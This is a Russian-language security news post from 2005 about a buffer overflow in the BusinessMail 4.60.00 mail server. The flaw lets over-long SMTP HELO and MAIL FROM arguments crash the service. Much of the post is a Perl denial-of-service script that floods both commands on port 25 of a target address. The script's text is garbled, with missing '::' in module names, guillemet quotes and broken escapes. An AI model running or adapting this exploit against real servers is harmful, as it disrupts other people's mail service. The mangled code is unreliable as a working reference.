http://Comp-Info.ru Все о компе!

Переволнение буффера в BusinessMail почтовой серверной системе версии 4.60.00

Детали: Комманды в SMTP HELO и MAIL FROM: не проверяються и не фильтруються.
Подставление длинного аргумента для HELO и MAIL FROM: приведёт к аварийному завершению работы приложения.

Уязвимые версии:
BusinnessMail email sever system 4.60.00

Патчи:
Производитель был осведомлен. Обновление будет выпушенно в кратчайшие сроки.

Обновление будет выложенно на оффециальном сайте производителя (www.netcplus.com)

Эксплоит:
#===== Start BusMail_SMTPDOS.pl =====
#
# Usage: BusMail_SMTPDOS.pl
# BusMail_SMTPDOS.pl 127.0.0.1
#
# BusinessMail email server system 4.60.00
#
# Download:
# www.netcplus.com/
#
##########################################

use IOSocket;
use strict;

my($socket) = "";

if ($socket = IOSocketINET->new(PeerAddr => $ARGV[0],
PeerPort => «25»,
Proto => «TCP»))
{
print «Attempting to kill BusinessMail SMTP server at $ARGV[0]:25…n»;

sleep(1);

print $socket "HELO " . «A» x 512 . «rn»;

sleep(1);

print $socket «MAIL FROM:» . «A» x 512 . «rn»;

close($socket);
}
else
{
print «Cannot connect to $ARGV[0]:25n»;
}

Переволнение буффера в BusinessMail почтовой серверной системе версии

9 августа 2005 | ASSCOL | Архив Новостей

Комментариев: 0

Добавить комментарий

Ваше имя:
Ваш E-mail: (при желании)

Запомнить меня?

Переволнение буффера в BusinessMail почтовой серверной системе версии

9 августа 2005 | ASSCOL | Архив Новостей

Комментариев: 0

Добавить комментарий

Ваше имя: Ваш E-mail: (при желании) Запомнить меня?

Ваше имя:
Ваш E-mail: (при желании)

Запомнить меня?